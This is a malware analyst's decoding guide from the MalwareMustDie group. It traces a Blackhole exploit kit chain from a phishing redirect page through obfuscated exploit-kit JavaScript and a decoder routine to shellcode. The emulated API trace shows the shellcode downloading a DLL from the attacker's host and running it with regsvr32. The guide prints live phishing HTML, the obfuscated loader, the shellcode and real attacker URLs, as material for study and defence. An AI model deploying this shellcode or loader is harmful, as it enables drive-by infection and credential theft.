#malwareMustDie - BHEK decodeGUIDE (payload: Cridex/Parfeit)

MalwareMustDie, Dec 22nd, 2012
# MalwareMustDie - PluginDetect Decoding Guide
# for the Trojan parfeit Investigation
# (Credential Stealer Case)
------------

--18:06:57--  h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
           => `cpa_inform.htm'
Resolving www.irwra.com... 50.116.98.44
Connecting to www.irwra.com|50.116.98.44|:80... connected.
HTTP request sent, awaiting response... HTTP/1.1 200 OK

// real time with Xurl..

@unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   813  100   813    0     0   1187      0 --:--:-- --:--:-- --:--:--  4567
<html>
<head>
<title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>

<script type="text/javascript">
<!--
location.replace("h00p://latticesoft.net/detects/continues-little.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
</noscript>

</head>

<h1>You will be redirected to details of purchase</h1>


<h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>

<h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>

<h3>Redirecting to Survey details... Please wait...</h3>



</html>

------------------------------------------------

--2012-12-22 03:44:27--  h00p://latticesoft.net/detects/continues-little.php
Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.

---request begin---
GET /detects/continues-little.php HTTP/1.1
Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: #MalwareMustDie!
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Fri, 21 Dec 2012 18:44:29 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.14
200 OK
Length: unspecified [text/html]
Saving to: `continues-little.php'
2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]

--------------------------------------------------------

TRY TWO:

--14:18:07--  h00p://latticesoft.net/detects/continues-little.php
          => `continues-little.php.1'
Resolving latticesoft.net... seconds 0.00, 59.57.247.185
Caching latticesoft.net => 59.57.247.185
Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5348 (new refcount 1).
---request begin---
GET /detects/continues-little.php HTTP/1.0
Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
Accept: */*
Host: latticesoft.net
Connection: Keep-Alive

---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.3.3
Date: Sat, 22 Dec 2012 05:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14

---response end---
200 OK
Length: unspecified [text/html]
14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337]  <=============== the size changes....


---------------
// CHANGES!!!!!! Why? What?
// what had changed??
// let's use unix's diff command to diff the previous code w/ the new one and see what changes the moronz made:

0x001c1

< <html><head><title></title></head><body>
<applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="&#00104;&#00119;">
<param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="&#00118;&#0097;&#00108;"/>
<param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
</applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){


0x007c7

< <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
-8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
-5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
-16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
-7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
-8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6

0x018c18

<       if(a["su"+"bstr"](i,1)=="-")i+=2;
---
>       if(a["substr"](i,1)=="-")i+=2;

// yep, the moronz changed the jar applet infector (0x001c1),
// changed the obfuscation code (0x007c7), and also
// made the strings for the obfs generator code more scattered (0x018c18)

// These three changes suggest the payload has changed.
// Never mind the old payload, let's get into the new one!

--------------------------------------------------------

// See the latest code...

// let's strip the garbage html code & make it more viewable..
// then see which are the parts of the obfuscation & its structure,
// and recognize where the obfuscated data feed code & the decoding generator code are.

// After that go to the obfuscation part and understand the structure < important!
// In this case those malware moronz are splitting the obfuscation code within a.setAttribute()
// arrays using script tags, just adjust them by deleting all <script></script>
// tags and you're good to go.

// So, the structure of the current obfuscation is:

a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
               z0+1
               :
               z29

// And this is the code to feed obfuscated data...

dd="i";
pp="e"+"In";

asd=function()
  {
  for(i=0;;i++)
      {
      r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
      }};
a=document.createElement(dd);


// Thus, this is the generator part to crack the code;

document.body.appendChild(a);
if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
{
  ss=String.fromCharCode;
  a=document["getElementsB"+"yTagName"](dd);
  a=a[0];
  s=new String();
  asd();
  a=s;
  s=new String();
  e=window["eva"+"l"];
  p=parseInt;
  for(i=0;a.length>i;i+=2)
  {
    if(a["su"+"bstr"](i,1)=="-")i+=2;
    s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  }
  try
  {
    document.body*=document;
  }
  catch(asfas)
  {
    e("if(1)"+s);
  }
}


// And this is the logic formula to crack :

  // here's the formula...
  for(i=0;a.length>i;i+=2)
  {
    if(a["substr"](i,1)=="-")i+=2;
    s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  }


// You can manipulate the decoding operation easily by making
// an array of the a element and feeding array entries 0 to 29 with
// the garbled code one by one, then just feed it into the
// formula.
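A stand-alone re-implementation of that formula, added here as an example (it is not the malware's own code and not a MalwareMustDie tool): decodeBhek applies (parseInt(pair, 23) - 24) / 3 and skips the "-x" junk pairs the way the loop above does, joinAttributes mirrors asd() over a plain object holding z0..zN, and encodeBhek / buildSampleAttributes are my own inverse, assumed to match the "-x" plus three-pair group layout seen in the z5 chunk, used only to build a harmless constructed sample so the decoder can be checked offline.

```javascript
const BASE = 23;
// Analyst-side decoder for the page's formula: charCode = (parseInt(pair, 23) - 24) / 3.
// A "-" at the current offset marks a "-x" junk pair, skipped exactly as the
// malware's loop does (i += 2, then the next pair is decoded).
function decodeBhek(a) {
  let s = "";
  for (let i = 0; i < a.length; i += 2) {
    if (a[i] === "-") i += 2;              // skip the "-x" junk pair
    const pair = a.slice(i, i + 2);
    if (pair.length < 2) break;            // trailing partial pair: nothing to decode
    const v = parseInt(pair, BASE);
    // Sanity check added here: chunks following this scheme always give an integer char code.
    if (Number.isNaN(v) || (v - 24) % 3 !== 0) throw new Error(`bad pair "${pair}" at ${i}`);
    s += String.fromCharCode((v - 24) / 3);
  }
  return s;
}

// Mirror of asd(): concatenate z0, z1, ... until an attribute is missing.
// `attrs` is a plain object standing in for the <i> element's attributes.
function joinAttributes(attrs) {
  let s = "";
  for (let i = 0; attrs["z" + i]; i++) s += attrs["z" + i];
  return s;
}

function decodeElementAttributes(attrs) { return decodeBhek(joinAttributes(attrs)); }

// Inverse of the formula, my own assumption about the layout: a "-" plus one
// junk digit precedes every group of three pairs, as in the z5 sample above.
function encodeBhek(plain, junk = "0") {
  let out = "";
  for (let k = 0; k < plain.length; k++) {
    const c = plain.charCodeAt(k);
    if (c > 168) throw new RangeError("3*c+24 must fit in two base-23 digits");
    if (k % 3 === 0) out += "-" + junk;
    out += (3 * c + 24).toString(BASE).padStart(2, "0");
  }
  return out;
}

// Constructed sample (not the real payload), spread over z0..zN the way the
// page describes; chunk boundaries may fall anywhere, even inside a pair.
const SAMPLE_SOURCE = 'var PluginDetect={version:"0.7.9",name:"PluginDetect"};';
function buildSampleAttributes(chunkLen = 17) {
  const enc = encodeBhek(SAMPLE_SOURCE, "7");
  const attrs = {};
  for (let i = 0, n = 0; i < enc.length; i += chunkLen, n++) attrs["z" + n] = enc.slice(i, i + chunkLen);
  return attrs;
}
```

To recover the script from a captured page, put the real z0..z29 values into `attrs` instead of calling buildSampleAttributes(); the decoded text is returned as a string and never reaches eval.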


//And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)

var PluginDetect =
{
  version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
  {
    return function ()
    {
      c(b, a)
    }
  }
  , openTag : "<", isDefined : function (b)
  {
    return typeof b != "undefined"
  }
  , isArray : function (b)
  {
    return (/array/i).test(Object.prototype.toString.call(b))
       :
       :(blah! etc)

//let's modify the shellcode to grab the payload:

var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
var x=a["replace"](/\%!/g, "%" + "u");
document.write(x);

↓↓

%u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828


// here's the shellcode (in bin & text)....


// And the translation of the API calls.....

0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)

----
#MalwareMustDie!
unixfreaxjp /malware]$ date
Sat Dec 22 18:59:02 JST 2012